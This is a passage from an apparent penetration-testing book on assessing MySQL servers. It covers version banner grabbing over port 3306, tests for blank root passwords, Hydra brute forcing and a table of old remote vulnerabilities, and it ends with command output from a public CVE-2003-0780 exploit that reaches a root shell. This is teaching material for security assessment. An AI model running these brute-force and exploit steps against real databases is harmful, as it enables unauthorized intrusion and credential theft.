8.11 MySQL

MySQL is commonly found running on TCP port 3306 on Linux and FreeBSD servers. The database is relatively straightforward to administer, with a much simpler access model than the heavyweight, but more scalable, Oracle.

8.11.1 MySQL Enumeration

The version of the target MySQL database can be easily gleaned simply by using nc or telnet to connect to port 3306 and analyzing the string received, as shown here:

# telnet 3306


Connected to

Escape character is '^]'.



Connection closed by foreign host.

The version of MySQL in this case is 3.23.52. If the server has been configured with a strict list of client systems defined, you will see a response like this:

# telnet db.example.org 3306


Connected to db.example.org.

Escape character is '^]'.

PHost 'cyberforce.segfault.net' is not allowed to connect to this

MySQL server

Connection closed by foreign host.

8.11.2 MySQL Brute Force

By default, the MySQL database accepts user logins as root with no password. A simple Unix-based utility called finger_mysql is useful for testing network blocks for MySQL instances that accept a blank root password, available in source form at http://www.securiteam.com/tools/6Y00L0U5PC.html.

Usefully, when the tool compromises the database, it lists the users and their password hashes from the mysql.user table. There are a number of tools in the Packet Storm archive that can be used to crack these encrypted passwords.

If a blank root password doesn't provide access, the Hydra utility can be used to launch a parallel MySQL brute-force attack.

By performing brute-force password grinding and assessment of the database configuration, MetaCoretex can also assess MySQL instances efficiently. If you are responsible for the security of database services, I highly recommend that you use MetaCoretex to provide assurances relating to remote attack.

8.11.3 MySQL Process-Manipulation Vulnerabilities

At the time of writing, the ISS X-Force database (http://xforce.iss.net) lists a number of serious, remotely exploitable vulnerabilities in MySQL (i.e., not authenticated or denial of service issues), as shown in Table 8-7.

Table 8-7. Serious remotely exploitable MySQL vulnerabilities






MySQL 4.x and prior mysql_real_connect( ) overflow



MySQL 3.23.53a and prior along with 4.0.5a and prior COM_CHANGE_USER password overflow



MySQL 3.23.53a and prior along with 4.0.5a and prior COM_CHANGE_USER authentication bypass



MySQL 3.22.33 and prior crafted client hostname overflow



MySQL 3.22.32 and prior unauthenticated remote access vulnerability

A recent vulnerability that isn't listed within the ISS X-Force database at the time of writing is CVE-2003-0780, which relates to a remote vulnerability in MySQL 3.23.56 and 4.0.15 and prior. An exploit for this issue is available at http://packetstormsecurity.org/0309-exploits/09.14.mysql.c.

Example 8-20 shows the exploit script in use against a vulnerable MySQL server, providing root access to the operating system. For exploit usage and options, simply run the tool with no arguments.

Example 8-20. Using the CVE-2003-0780 exploit against MySQL
# ./mysql -d -p "" -t 1


#  Mysql 3.23.x/4.0.x remote exploit(2003/09/12)  #

@ by bkbll(bkbll_at_cnhonker.net,bkbll_at_tom.com @


[+] Connecting to mysql server

[+] ALTER user column...ok

[+] Select a valid user...ok

[+] Found a user:test

[+] Password length:480

[+] Modified password...ok

[+] Finding client socket......ok

[+] socketfd:3

[+] Overflow server....ok

[+] sending OOB.......ok

[+] Waiting a shell.....